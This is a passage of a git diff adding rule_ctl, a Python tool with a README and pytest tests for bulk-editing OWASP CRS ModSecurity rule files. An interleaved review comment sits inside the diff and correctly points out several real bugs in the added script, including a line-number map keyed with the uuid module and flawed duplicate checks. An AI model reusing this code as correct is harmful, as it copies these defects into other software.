files is needed. rule_ctl.py can, for example, change the value of an action on all rules, or can add/remove/rename a tag on each rule in a file, or can add/remove a transformation function only in rules that match range 942100-942190, etc... + +## Example Usage + +There're only two mandatory parameters: `--config` and `--filter-rule-id`. + +**--config** set the target config file
+**--filter-rule-id** a regex that matches only rule ids to change + +For example, if you want to add a new tag on each rule in file `REQUEST-933-APPLICATION-ATTACK-PHP.conf` you can do: + +```sh +python3 util/rule_ctl/rule_ctl.py \ + --config rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf \ + --filter-rule-id ^933.+ \ + --append-tag foo + --dryrun +``` + +`--dryrun` sends to stdout the result of changes and prevent writing changes on file. It's a good idea to always check all commands with dryrun before overwrite the target configuration file. + +You can even alphabetically sort tag list while adding new tags: +```sh +python3 util/rule_ctl/rule_ctl.py \ + --config rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf \ + --filter-rule-id ^933.+ \ + --append-tag foo + --sort-tag + --dryrun +``` + +## Variables +- `--append-variable`: Append a variable on the variable list of selected rules +- `--remove-variable`: Remove exact matching variable from selected rules +- `--replace-variable`: Replace variable on selected rules + +### Examples +Replace the variable name `ARGS` with `ARGS_GET` +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --replace-variable ARGS,ARGS_GET \ + --dryrun +``` + +Replace the variable `ARGS` with `!ARGS_GET:'lisa'` +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --replace-variable ARGS,\!ARGS_GET:\'lisa\' \ + --dryrun +``` + +## Tags +- `--append-tag`: Append a new tag to the tag list on selected rules +- `--remove-tag`: Remove tag from tag list on selected rules +- `--rename-tag`: Rename tag on selected rules +- `--sort-tags`: Alphabetically sort tag list on selected rules + +### Examples +Append a new tag `foo` and sort tag list +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --append-tag foo \ + --sort-tags \ + --dryrun +``` + +Remove a 
tag `foo` +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --remove-tag foo \ + --dryrun +``` + +Rename a tag `foo` +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --rename-tag foo,bar \ + --dryrun +``` + +## Transformation Functions +- `--append-tfunc`: Append a new transformation function on selected rules +- `--remove-tfunc`: Remove a transformation function on selected rules + +### Examples +Append `t:lowercase` to all selected rules (you don't need the `t:` prefix) +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^.\* \ + --append-tfunc lowercase \ + --dryrun +``` + +## Actions +- `--replace-action`: Replace action on selected rules +- `--remove-action`: remove action from selected rules + +### Examples +Replace action `severity:CRITICAL` with `severity:INFO` and set a new message on rule id 125 +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^125 \ + --replace-action severity:CRITICAL,severity:INFO \ + --uncond-replace-action 'msg:this is a new message for rule 125' \ + --dryrun +``` + +## CTL +- `--append-ctl`: Append a new ctl action on selected rules + +### Examples +Remove rule id 1337 on rule 125 by adding ctl:ruleRemoveById=1337. 
Do it on main rule (skipping chained rules if present) +```sh +python3 rule_ctl.py --config ../../rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf \ + --filter-rule-id ^125 \ + --append-ctl ruleRemoveById=1337 \ + --skip-chain \ + --dryrun +``` + +## Others +- `--target-file`: Set the target file where changes will be saved (default: use file set by `--config`) +- `--skip-chain`: Skip chained rules +- `--dryrun`: Do not write any changes, just output the results +- `--debug`: Show debug messages +- `--silent`: Used with `--dryrun` and `--debug` doesn't write and shows only debug messages +- `--json`: Used with `--dryrun` return the msc_pyparser JSON output instead of ModSecurity file diff --git a/util/rule_ctl/pyproject.toml b/util/rule_ctl/pyproject.toml new file mode 100644 index 0000000000..77c7e6effc --- /dev/null +++ b/util/rule_ctl/pyproject.toml @@ -0,0 +1,5 @@ +[tool.pytest.ini_options] +minversion = "6.0" +testpaths = [ + "tests", +] diff --git a/util/rule_ctl/requirements.txt b/util/rule_ctl/requirements.txt new file mode 100644 index 0000000000..2e1b1f04f6 --- /dev/null +++ b/util/rule_ctl/requirements.txt @@ -0,0 +1,3 @@ +argparse +msc_pyparser +pytest diff --git a/util/rule_ctl/rule_ctl.py b/util/rule_ctl/rule_ctl.py new file mode 100755 index 0000000000..afa4f155a0 --- /dev/null +++ b/util/rule_ctl/rule_ctl.py 
@@ -0,0 +1,801 @@ +#! /usr/bin/env python + +import sys, re, json, uuid + +try: + import argparse, msc_pyparser +except: + print(f"Error: missing modules.\nYou can install all dependences with: pip3 install -r requirements.txt") + sys.exit(1) + +ACTION_ORDER = { + key: index for index, key in enumerate( + [ + "id", + "phase", + "allow", + "block", + "deny", + "drop", + "pass", + "proxy", + "redirect", + "status", + "capture", + "t", + "log", + "nolog", + "auditlog", + "noauditlog", + "msg", + "logdata", + "tag", + "sanitiseArg", + "sanitiseRequestHeader", + "sanitiseMatched", + "sanitiseMatchedBytes", + "ctl", + "ver", + "severity", + "multiMatch", + "initcol", + "setenv", + "setvar", + "expirevar", + "chain", + "skip", + "skipAfter" + ] + ) +} + +class Context(object): + def __init__(self): + self.args = () + self.line_number_change = 0 + self.next_index_to_parse = 0 + self.parser = None + self._rules = [] + self._rules_map = {} + + def parse_rules(self, data): + mparser = msc_pyparser.MSCParser() + mparser.parser.parse(data, debug = False) + + for line in mparser.configlines: + type = line["type"] + if type == "SecAction": + rule = SecAction(line, self) + elif type == "Comment": + rule = Comment(line, self) + elif type == "SecRule": + rule = SecRule(line, self) + else: + rule = Directive(line, self) + + self._rules.append(rule) + if isinstance(rule, SecAction): + if rule.is_chained(): + self._rules_map[rule.id]['chained'].append(rule) + else: + self._rules_map[rule.id] = { + 'rule': rule, + 'chained': [] + } + yield rule + + def get_chain_starter_rule(self, rule): + try: + self._rules_map[rule.id]['rule'] + except KeyError: + # Chained rules don't have ID during initialization. 
+ # In this case, however, the last parsed rule now has one + return self._rules_map[self._rules[-1].id]['rule'] + + def dprint(self, rule_id, action, message, indent): + if not indent: + indent=0 + + prefix = "[*]" + if indent > 0: + prefix = "`" + + if not rule_id: + rule_id = "chained" + + print(f'{" "*int(indent)}{prefix} \033[92m{rule_id}/{action}\033[0m: {message}') + + def generate_output(self): + mwriter = msc_pyparser.MSCWriter(self.generate_lines()) + mwriter.generate() + return mwriter.output + + def generate_lines(self): + generated_lines = [] + line_number_change = 0 + for rule in self._rules: + lines, line_number_change = rule.generate_lines(line_number_change) + generated_lines.append(lines) + return generated_lines + + def parse_arguments(self, args=None): + args_parser = self._create_args_parser() + self.args = args_parser.parse_args(args) + + def _create_args_parser(self): + parser = argparse.ArgumentParser(description="OWASP CRS Configuration Control") + parser.add_argument("--config", dest="config", help="OWASP ModSecurity CRS config file path", required=True) + parser.add_argument("--filter-rule-id", dest="filter_rule_id", help="Filter on ruleid (regex)", required=False) + parser.add_argument("--append-variable", dest="append_variable", help="Append var on SecRule (string)", action='append', required=False) + parser.add_argument("--remove-variable", dest="remove_variable", help="Remove var from SecRule (string)", action='append', required=False) + parser.add_argument("--replace-variable", dest="replace_variable", help="Replace var in SecRule (old,new) (string)", action='append', required=False) + parser.add_argument("--append-tag", dest="append_tag", help="Append tag on SecRule (string)", required=False) + parser.add_argument("--remove-tag", dest="remove_tag", help="Remove tag from SecRule (string)", required=False) + parser.add_argument("--rename-tag", dest="rename_tag", help="Rename tag on SecRule (old,new) (string)", required=False) + 
parser.add_argument("--sort-tags", dest="sort_tags", help="Sort tag list in SecRule", action="store_true", required=False) + parser.add_argument("--append-tfunc", dest="append_tfunc", help="Append transformation func on SecRule (example: urlDecodeUni) (string)", action='append', required=False) + parser.add_argument("--remove-tfunc", dest="remove_tfunc", help="Remove transformation func from SecRule (example: urlDecodeUni) (string)", action='append', required=False) + parser.add_argument("--append-action", dest="append_action", help="Append action on Secrule (example: 'severity:CRITICAL) (string)", required=False) + parser.add_argument("--replace-action", dest="replace_action", help="Replace action (example: 'severity:CRITICAL,severity:INFO') (string)", required=False) + parser.add_argument("--remove-action", dest="remove_action", help="Remove action from SecRule (string)", required=False) + parser.add_argument("--append-ctl", dest="append_ctl", help="Append ctl action on SecRule (example: 'ruleRemoveTargetById=1234;ARGS:passwd') (string)", required=False) + parser.add_argument("--target-file", dest="target_file", help="Save changes in another file (string)", required=False) + parser.add_argument("--skip-chain", dest="skip_chain", help="Skip chained rules", action="store_true", required=False) + parser.add_argument("--dryrun", dest="dryrun", help="Show changes without write", action="store_true", required=False) + parser.add_argument("--silent", dest="silent", help="Do not output content file on dryrun", action="store_true", required=False) + parser.add_argument("--debug", dest="debug", help="Show debug messages", action="store_true", required=False) + parser.add_argument("--json", dest="output_json", help="Get all output in JSON format", action="store_true", required=False) + return parser + +class RuleFileItem(object): + def __init__(self, data, context): + self._data = data + self._line_numbers = {"rule_line": data["lineno"]} + + def modify(self, context): + 
pass + + def generate_lines(self, line_number_change): + new_line_number_change = self._update_line_numbers(line_number_change) + return (self._data, new_line_number_change) + + def _update_line_numbers(self, line_number_change): + self._data["lineno"] = self._line_numbers["rule_line"] + line_number_change + + return line_number_change + +class SecAction(RuleFileItem): + TAG_RENAME_REGEX = re.compile('^([^,]+),(.+)$') + ACTION_REPLACE_REGEX = re.compile('^([^,]+),(.+)$') + ACTION_REPLACE_VALUES_REGEX = re.compile('^([^:]+)(?::(.+))?$') + CTL_APPEND_REGEX = re.compile('^([^=]+)=([^;]+)(;[^:]+:.+|)$') + CTL_APPEND_PARAMS_REGEX = re.compile('^;([^:]+):(.+)$') + id = None + _id_matcher = None + + def __init__(self, data, context): + super().__init__(data, context) + + for action in self.get_actions(): + action["id"] = uuid.uuid4() + if action["act_name"] == "id": + self.id = int(action["act_arg"]) + break + + if "oplineno" in self._data: + self._line_numbers["opline"] = self._data["oplineno"] + for action in self.get_actions(): + self._line_numbers[("action", uuid)] = action["lineno"] + + def _parse_var(self, variable): + negated = False + counter = False + newvar = variable + newvarpart = "" + quote_type = "no_quote" + m = re.match('^([!&]?)([^:]+)(?::(.+))?$', variable) + if m: + counter = m.group(1) == '&' + negated = m.group(1) == '!' 
+ newvar = m.group(2) + varpart = m.group(3) + if varpart is not None: + if varpart[0] == '"' and varpart[-1] == '"': + quote_type = 'quoted' + varpart = varpart[1:-1] + elif varpart[0] == "'" and varpart[-1] == "'": + quote_type = 'quotes' + varpart = varpart[1:-1] + newvarpart = varpart + return { + "variable": newvar, + "variable_part": newvarpart, + "quote_type": quote_type, + "negated": negated, + "counter": counter + } + + def _is_equal_variable(self, variable1, variable2): + compare_fields = ("variable", "variable_part", "negated", "counter") + return all(variable1[field] == variable2[field] for field in compare_fields) + + def _has_variable(self, variable): + for var in self.get_variables(): + if self._is_equal_variable(variable, var): + return True + return False + + + + def _update_line_numbers(self, line_number_change): + #TODO: doesn't yet work when order changes, e.g. variables and tags may not have been grouped together + super()._update_line_numbers(line_number_change) + + first_line_number = last_line_number = self._data["lineno"] + + if "oplineno" in self._data: + last_line_number = self._line_numbers["opline"] + line_number_change + self._data["oplineno"] = last_line_number + + + for action in self.get_actions(): + try: + last_line_number = self._line_numbers[("action", action["id"])] + line_number_change + action["lineno"] = last_line_number + except KeyError: + # keep everything on one line if it already was + if any(lineno > self._line_numbers['rule_line'] for lineno in self._line_numbers.values()): + last_line_number += 1 + action["lineno"] = last_line_number + + original_first_line_number = min(self._line_numbers.values()) + original_last_line_number = max(self._line_numbers.values()) + original_length = original_last_line_number - original_first_line_number + new_length = last_line_number - first_line_number + start_change = first_line_number - original_first_line_number + length_change = new_length - original_length + total_change = 
length_change + start_change + return total_change + + def modify(self, context): + if context.args.filter_rule_id and not self.matches_id(context.args.filter_rule_id): + return + + self.append_tag(context) + self.remove_tag(context) + self.rename_tag(context) + self.append_tfunc(context) + self.remove_tfunc(context) + self.append_action(context) + self.replace_action(context) + self.remove_action(context) + self.append_variables(context) + self.remove_variables(context) + self.replace_variables(context) + self.append_ctl(context) + self.sort_tags(context) + + def get_actions(self): + try: + return self._data["actions"] + except KeyError: + return [] + + def set_actions(self, actions): + self._data["actions"] = actions + + def get_variables(self): + try: + return self._data["variables"] + except KeyError: + return [] + + def set_variables(self, variables): + self._data["variables"] = variables + + def get_tags(self): + return [action for action in self.get_actions() if action["act_name"] == "tag"] + + def get_ctls(self): + return [action for action in self.get_actions() if action["act_name"] == "ctl"] + + def matches_id(self, id_pattern): + if self._id_matcher is None: + self._id_matcher = re.compile(id_pattern) + return self._id_matcher.match(str(self.id)) != None + + def append_tag(self, context): + if context.args.append_tag is None: + return + + #TODO: support appending multiple tags + tags = self.get_tags() + if context.args.append_tag in [tag["act_arg"] for tag in tags]: + return + + actions = self.get_actions() + new_act_list = [] + last_tag_line = 0 + tag_order = ACTION_ORDER["tag"] + new_tag = { + 'id': uuid.uuid4(), + 'act_name': 'tag', + 'lineno': 0, + 'act_quote': 'quotes', + 'act_arg': context.args.append_tag, + 'act_arg_val': '', + 'act_arg_val_param': '', + 'act_arg_val_param_val': '' + } + + done = False + last_action_index = len(actions) - 1 + for index, action in enumerate(actions): + action_name = action["act_name"] + action_order = 
ACTION_ORDER[action_name] + if action_order <= tag_order: + last_tag_line = action["lineno"] + new_act_list.append(action) + if not done and (action_order > tag_order or index == last_action_index): + done = True + new_act_list.append(new_tag) + if context.args.debug: + context.dprint(self.id, "append-tag", f"append tag {context.args.append_tag} on line {last_tag_line}", 0) + if action_order > tag_order: + new_act_list.append(action) + self.set_actions(new_act_list) + + def remove_tag(self, context): + if context.args.remove_tag is None: + return + + #TODO: support removing multiple tags + actions = self.get_actions() + new_act_list = [] + for action in actions: + if action["act_name"] == "tag": + if action["act_arg"] != context.args.remove_tag: + new_act_list.append(action) + else: + if context.args.debug: + context.dprint(self.id, "remove-tag", f"remove tag {context.args.remove_tag} on line {action['lineno']}", 0) + else: + new_act_list.append(action) + + self.set_actions(new_act_list) + + def rename_tag(self, context): + if context.args.rename_tag is None: + return + + match = self.TAG_RENAME_REGEX.match(context.args.rename_tag) + if match is None: + return + + old_tag = match.group(1) + new_tag = match.group(2) + new_act_list = [] + for act in self.get_actions(): + if act["act_name"] == "id": + current_rule_id = act["act_arg"] + if act["act_name"] == "tag": + if act["act_arg"] == old_tag: + act["act_arg"] = new_tag + if context.args.debug: + context.dprint(current_rule_id, "rename-tag", f"rename tag {old_tag} to {new_tag} on line {act['lineno']}", 0) + new_act_list.append(act) + else: + new_act_list.append(act) + self.set_actions(new_act_list) + + def append_action(self, context): + if context.args.append_action is None: + return + + match = self.ACTION_REPLACE_VALUES_REGEX.match(context.args.append_action) + if match is None: + return + + new_action_name = match.group(1) + new_action_value = match.group(2) or "" + + #TODO: support appending multiple actions + 
actions = self.get_actions() + if ( + new_action_name in [action["act_name"] for action in actions] and + new_action_value in [action["act_arg"] for action in actions] + ): + return + + new_act_list = [] + last_action_line = 0 + new_action_order = ACTION_ORDER[new_action_name] + has_quotes = len(new_action_value) > 0 and new_action_value[0] in '"\'' and new_action_value[-1] in '"\'' + if has_quotes: + new_action_value = new_action_value[1:-1] + new_action = { + 'id': uuid.uuid4(), + 'act_name': new_action_name, + 'lineno': 0, + 'act_quote': 'quotes' if has_quotes else 'no_quote', + 'act_arg': new_action_value, + 'act_arg_val': '', + 'act_arg_val_param': '', + 'act_arg_val_param_val': '' + } + + done = False + last_action_index = len(actions) - 1 + for index, action in enumerate(actions): + action_name = action["act_name"] + action_order = ACTION_ORDER[action_name] + if action_order <= new_action_order: + last_action_line = action["lineno"] + new_act_list.append(action) + if not done and (action_order > new_action_order or index == last_action_index): + done = True + new_act_list.append(new_action) + if context.args.debug: + context.dprint(self.id, "append-action", f"append action {context.args.append_action} on line {last_action_line}", 0) + if action_order > new_action_order: + new_act_list.append(action) + + if len(new_act_list) == 0: + new_act_list.append(new_action) + + self.set_actions(new_act_list) + + + + def replace_action(self, context): + if context.args.replace_action is None: + return + + match = self.ACTION_REPLACE_REGEX.match(context.args.replace_action) + if match is None: + return + + from_string = match.group(1) + to_string = match.group(2) + from_match = self.ACTION_REPLACE_VALUES_REGEX.match(from_string) + to_match = self.ACTION_REPLACE_VALUES_REGEX.match(to_string) + if from_match is None or to_match is None: + return + + from_actname = from_match.group(1) + from_actvalue = from_match.group(2) or "" + to_actname = to_match.group(1) + to_actvalue 
= to_match.group(2) or "" + has_quotes = len(to_actvalue) > 0 and to_actvalue[0] in '"\'' and to_actvalue[-1] in '"\'' + if has_quotes: + to_actvalue = to_actvalue[1:-1] + + for act in self.get_actions(): + if act["act_name"] == from_actname: + # match all actions of the specified name if `from_actvalue` is empty + if len(from_actvalue) == 0 or act["act_arg"] == from_actvalue: + act["act_name"] = to_actname + act["act_arg"] = to_actvalue + act["act_quote"] = "quotes" if has_quotes else "no_quote" + + def remove_action(self, context): + if context.args.remove_action is None: + return + + actions = self.get_actions() + new_act_list = [] + for action in actions: + if action["act_name"] != context.args.remove_action: + new_act_list.append(action) + + self.set_actions(new_act_list) + + def append_tfunc(self, context): + if context.args.append_tfunc is None: + return + + transform_order = ACTION_ORDER["t"] + actions = self.get_actions() + last_action_index = len(actions) - 1 + transformation_names = [action["act_arg"] for action in actions if action["act_name"] == "t"] + + for tfunc in context.args.append_tfunc: + if tfunc in transformation_names: + continue + + new_act_list = [] + done = False + last_lineno = 0 + for index, act in enumerate(actions): + action_name = act["act_name"] + action_order = ACTION_ORDER[action_name] + if action_order <= transform_order: + last_lineno = act["lineno"] + new_act_list.append(act) + if not done and (action_order > transform_order or index == last_action_index): + done = True + new_act_list.append({ + 'id': uuid.uuid4(), + 'act_name': 't', + 'lineno': last_lineno, + 'act_quote': 'no_quote', + 'act_arg': tfunc, + 'act_arg_val': '', + 'act_arg_val_param': '', + 'act_arg_val_param_val': '' + }) + if context.args.debug: + context.dprint(self.id, "append-tfunc", f"append transformation {context.args.append_tfunc} on line {last_lineno}", 0) + if action_order > transform_order: + new_act_list.append(act) + actions = new_act_list + + 
self.set_actions(actions) + + + def remove_tfunc(self, context): + if context.args.remove_tfunc is None: + return + + actions = self.get_actions() + for tfunc in context.args.remove_tfunc: + new_act_list = [] + for act in actions: + if act["act_name"] == "t": + if act["act_arg"] != tfunc: + new_act_list.append(act) + else: + new_act_list.append(act) + actions = new_act_list + + self.set_actions(actions) + + + def append_variables(self, context): + if context.args.append_variable is None: + return + + variables = self.get_variables() + for nv in context.args.append_variable: + newvar = self._parse_var(nv) + if self._has_variable(newvar): + continue + + new_var_list = [] + for v in variables: + new_var_list.append(v) + new_var_list.append({ + "variable": newvar["variable"], + "variable_part": newvar["variable_part"], + "quote_type": "no_quote", + "negated": newvar["negated"], + "counter": newvar["counter"] + }) + if context.args.debug: + context.dprint(self.id, "append-variable", f"Append variable {newvar}:{newvar['variable_part']}", 0) + variables = new_var_list + + self.set_variables(variables) + + + def remove_variables(self, context): + if context.args.remove_variable is None: + return + + variables = self.get_variables() + for nv in context.args.remove_variable: + var = self._parse_var(nv) + if not self._has_variable(var): + continue + + new_var_list = [] + for v in variables: + if not self._is_equal_variable(var, v): + new_var_list.append(v) + else: + if context.args.debug: + varpart = var["variable_part"] + negated = var["negated"] + counter = var["counter"] + context.dprint(self.id, "remove-variable", f"Removed variable {var}:{varpart} negated:{negated} counter:{counter}", 0) + variables = new_var_list + self.set_variables(variables) + + + def replace_variables(self, context): + if context.args.replace_variable is None: + return + + variables = self.get_variables() + for nv_tosplit in context.args.replace_variable: + oldvar, newvar = nv_tosplit.split(",") + 
ov = self._parse_var(oldvar) + nv = self._parse_var(newvar) + + new_variable = nv["variable"] + newvarpart = nv["variable_part"] + newnegated = nv["negated"] + newcounter = nv["counter"] + newquotetype = nv["quote_type"] + old_variable = ov["variable"] + oldvarpart = ov["variable_part"] + oldnegated = ov["negated"] + oldcounter = ov["counter"] + oldquotetype = ov["quote_type"] + new_var_list = [] + for v in variables: + if (v["variable"] == old_variable and v["variable_part"] == oldvarpart + and v["negated"] == oldnegated and v["counter"] == oldcounter and v["quote_type"] == oldquotetype): + new_var_list.append({ + "variable": new_variable, + "variable_part": newvarpart, + "quote_type": newquotetype, + "negated": newnegated, + "counter": newcounter + }) + if context.args.debug: + context.dprint(self.id, "replace-variable", f"Replaced variable {oldvar}:{oldvarpart} negated:{oldnegated} counter:{oldcounter} quote_type:{oldquotetype} with {newvar}:{newvarpart} negated:{newnegated} counter:{newcounter} quote_type:{newquotetype}", 0) + else: + new_var_list.append(v) + variables = new_var_list + + self.set_variables(variables) + + def append_ctl(self, context): + # TODO: support appending multiple ctl + if context.args.append_ctl is None: + return + + match = self.CTL_APPEND_REGEX.match(context.args.append_ctl) + if match is None: + return + + arg = match.group(1) + if arg.startswith('ctl:'): + arg = arg[4:] + val = match.group(2) + + params = self.CTL_APPEND_PARAMS_REGEX.match(match.group(3)) + param = params.group(1) if params is not None else "" + paramval = params.group(2) if params is not None else "" + + ctls = self.get_ctls() + if ( + arg in [ctl["act_arg"] for ctl in ctls] and + val in [ctl["act_arg_val"] for ctl in ctls] and + param in [ctl["act_arg_val_param"] for ctl in ctls] and + paramval in [ctl["act_arg_val_param_val"] for ctl in ctls] + ): + return + + actions = self.get_actions() + new_act_list = [] + last_ctl_line = 0 + ctl_order = ACTION_ORDER["ctl"] + 
new_ctl = { + "id": uuid.uuid4(), + "act_name": "ctl", + "lineno": last_ctl_line, + "act_quote": "no_quote", + "act_arg": arg, + "act_arg_val": val, + "act_arg_val_param": param, + "act_arg_val_param_val": paramval + } + + done = False + last_action_index = len(actions) - 1 + for index, action in enumerate(actions): + action_name = action["act_name"] + action_order = ACTION_ORDER[action_name] + if action_order <= ctl_order: + last_ctl_line = action["lineno"] + new_act_list.append(action) + if not done and (action_order > ctl_order or index == last_action_index): + done = True + new_act_list.append(new_ctl) + if context.args.debug: + context.dprint(self.id, "append-ctl", f"append ctl {context.args.append_ctl} on line {last_ctl_line}", 0) + if action_order > ctl_order: + new_act_list.append(action) + + if len(new_act_list) == 0: + new_act_list.append(new_ctl) + + self.set_actions(new_act_list) + + + def sort_tags(self, context): + #TODO: tags don't need to be grouped together; need to look through all actions + if not context.args.sort_tags: + return + + new_act_list = [] + post_tag_actions = [] + tags = [] + last_lineno = None + found_tag = False + for act in self.get_actions(): + if act["act_name"] == "tag": + tags.append(act) + found_tag = True + if last_lineno is None: + first_lineno = act["lineno"] + elif not found_tag: + new_act_list.append(act) + elif found_tag: + post_tag_actions.append(act) + + def get_sort_key(tag): + return tag["act_arg"].lower() + + sorted_tags = sorted(tags, key=get_sort_key) + for tag in sorted_tags: + new_act_list.append(tag) + tag["lineno"] = first_lineno + first_lineno += 1 + + for act in post_tag_actions: + new_act_list.append(act) + + self.set_actions(new_act_list) + +class Comment(RuleFileItem): + pass + +class Directive(RuleFileItem): + pass + +class SecRule(SecAction): + _is_chained = False + + def __init__(self, data, context): + super().__init__(data, context) + + # for chained rules (they have no ID) + if self.id is None: + 
self.id = context.get_chain_starter_rule(self).id
+ self._is_chained = True
+
+ def has_chained_rules(self):
+ return self._data["chained"]
+
+ def is_chained(self):
+ return self._is_chained
+
+ def modify(self, context):
+ if context.args.skip_chain and self.is_chained():
+ return
+
+ super().modify(context)
+
+
+def write_output(context):
+ if context.args.dryrun and context.args.output_json:
+ print(json.dumps(context.generate_lines(), indent=4))
+ return
+
+ if context.args.dryrun:
+ if not context.args.silent:
+ print("\n".join(context.generate_output()))
+ return
+
+ path = context.args.target_file if context.args.target_file else context.args.config
+ with open(path, 'w') as handle:
+ handle.write("\n".join(context.generate_output()))
+
+
+def run():
+ context = Context()
+ context.parse_arguments()
+
+ with open(context.args.config) as file:
+ data = file.read()
+
+ for rule in context.parse_rules(data):
+ rule.modify(context)
+
+ write_output(context)
+
+if __name__ == '__main__':
+ run()
diff --git a/util/rule_ctl/tests/__init__.py b/util/rule_ctl/tests/__init__.py
new file mode 100644
index 0000000000..e69de29bb2
diff --git a/util/rule_ctl/tests/helpers.py b/util/rule_ctl/tests/helpers.py
new file mode 100644
index 0000000000..52829f2b3a
--- /dev/null
+++ b/util/rule_ctl/tests/helpers.py
@@ -0,0 +1,16 @@
+from rule_ctl import Context
+
+def create_context(arguments, rules_string):
+ context = Context()
+ patched_arguments = arguments
+ if "--config" not in arguments:
+ patched_arguments = arguments + ["--config", "dummy"]
+ context.parse_arguments(args=patched_arguments)
+
+ for rule in context.parse_rules(rules_string):
+ rule.modify(context)
+ return context
+
+
+def get_output(context):
+ return "\n".join(context.generate_output()) + "\n"
diff --git a/util/rule_ctl/tests/rule_ctl_actions_test.py b/util/rule_ctl/tests/rule_ctl_actions_test.py
new file mode 100644
index 0000000000..f5657a3bb3
--- /dev/null
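Review bot: The duplicate check in `append_action` tests the action name and the value against the whole action list independently (`new_action_name in [...] and new_action_value in [...]`), so `--append-action msg:foo` is silently skipped on a rule that already has `msg:bar` together with `tag:foo`, and `append_ctl` applies the same per-field comparison across its four ctl fields; compare per action instead, e.g. `if any(a["act_name"] == new_action_name and a["act_arg"] == new_action_value for a in actions): return`. In `SecAction.__init__` the line-number map is keyed with the `uuid` module object rather than the action's id, `self._line_numbers[("action", uuid)] = action["lineno"]`, so every lookup of `("action", action["id"])` in `_update_line_numbers` falls into the KeyError fallback; it should read `self._line_numbers[("action", action["id"])] = action["lineno"]`. `rename_tag` binds `current_rule_id` only when an `id` action precedes the tag, so with `--debug` a chained rule (which carries no `id` action) raises NameError — pass `self.id` as the other handlers do. The bare `except:` around the imports also swallows `KeyboardInterrupt` and `SystemExit`; `except ImportError:` is what is meant. Separately, `write_output` writes `"\n".join(...)` with no trailing newline while the test helper `get_output` appends one, so rewriting a config file in place strips its final newline.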
+++ b/util/rule_ctl/tests/rule_ctl_actions_test.py 
@@ -0,0 +1,377 @@ +from .helpers import * + +class TestAppendAction: + def test_append_action_with_no_actions(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12,msg:foo" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_action_with_existing_actions(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + log:'abc'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + log:'abc',\\ + msg:foo" +""" + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_action_with_duplicate_action(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:'foo',\\ + log:'abc'" +""" + + context = create_context(arguments, rule_string) + assert rule_string == get_output(context) + + def test_append_action_in_correct_order(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + logdata:'data'" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + msg:foo,\\ + logdata:'data'" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_action_with_chain(self): + arguments = [ + "--append-action", "msg:foo", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + logdata:'data',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + 
"id:12,\\ + deny,\\ + noauditlog,\\ + msg:foo,\\ + logdata:'data',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" \\ + "msg:foo" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_append_action_skip_chain(self): + arguments = [ + "--append-action", "msg:foo", + "--skip-chain" + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + logdata:'data',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" +""" + expected = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + deny,\\ + noauditlog,\\ + msg:foo,\\ + logdata:'data',\\ + chain" + + SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx bar" +""" + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + +class TestReplaceAction: + def test_replace_action_with_no_actions(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar "@rx foo" "id:12" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def test_replace_action_with_existing_actions(self): + arguments = [ + "--replace-action", "msg:foo,msg:bar", + ] + rule_string = """ +SecRule ARGS|ARGS:foo|!ARGS:bar \\ + "@rx foo" \\ + "id:12,\\ + msg:bar,\\ + log:'abc'" +""" + expected = rule_string + + context = create_context(arguments, rule_string) + assert expected == get_output(context) + + + def 